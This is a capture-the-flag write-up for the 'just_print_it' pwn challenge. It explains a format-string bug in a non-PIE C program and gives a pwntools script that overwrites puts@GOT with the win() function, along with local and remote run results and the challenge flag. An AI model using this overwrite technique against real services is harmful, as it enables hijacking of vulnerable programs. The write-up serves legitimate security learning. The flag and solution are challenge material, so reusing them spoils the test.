Skip to main content

just_print_it

Challenge

Imported from local notes.md.

Solution

Original Notes

just_print_it

Challenge Summary

  • Given: A remote TCP service at nc.umbccd.net:8925 and the published source code for a small C program.
  • Goal: Make the service print the real flag.
  • Constraints: Single line of input, no source changes on the remote side, standard DawgCTF flag format.

Initial Recon / Triage

  • Observations: main() reads a line into buffer, then calls printf(buffer); followed by puts("\nGoodbye!");. This is a direct format-string vulnerability.
  • File identification: The published build flags disable PIE, so code addresses are fixed. win() exists and prints flag.txt before exiting.
  • Entry points: User-controlled format string reaches printf with no format specifier, so %n can be used to overwrite memory.

Hypotheses & Approach

  • Hypothesis 1: Because the binary is non-PIE, overwriting a GOT entry with the fixed address of win() should be enough to redirect control flow.
  • Hypothesis 2: Overwriting puts@GOT is ideal because the program calls puts("\nGoodbye!") immediately after printf(buffer), so the hijack triggers right away without needing a return-oriented payload.

Execution Steps (Reproducible)

Stage 1

Commands:

cd /root/dawg2026CTF/just_print_it/artifacts
python3 - <<'PY'
from pwn import *
context.binary = './just_print_it'
elf = context.binary
payload = fmtstr_payload(6, {elf.got['puts']: elf.symbols['win']}, write_size='short')
print('payload_len', len(payload))
print(enhex(payload))
p = process('./just_print_it')
p.sendline(payload)
print(p.recvall(timeout=1).decode('latin1', errors='replace'))
PY

Results:

  • Verified the stack offset is 6 and that a short %n write can replace puts@GOT with win.
  • Local binary details used for the exploit: win = 0x401196, puts@GOT = 0x404000.
  • Local validation printed the placeholder local flag and confirmed the control-flow redirection worked.

Stage 2

Commands:

cd /root/dawg2026CTF/just_print_it/artifacts
python3 exploit.py

Results:

  • The same format-string payload was sent to nc.umbccd.net:8925.
  • The remote service responded with the real flag: DawgCTF{s3v3r_PWNed!}.

Artifacts Produced

  • artifacts/exploit.py - reusable remote exploit.
  • artifacts/just_print_it - local replica used to validate the overwrite.
  • artifacts/core.347405 - crash/core artifact from local testing.

Flag

DawgCTF{s3v3r_PWNed!}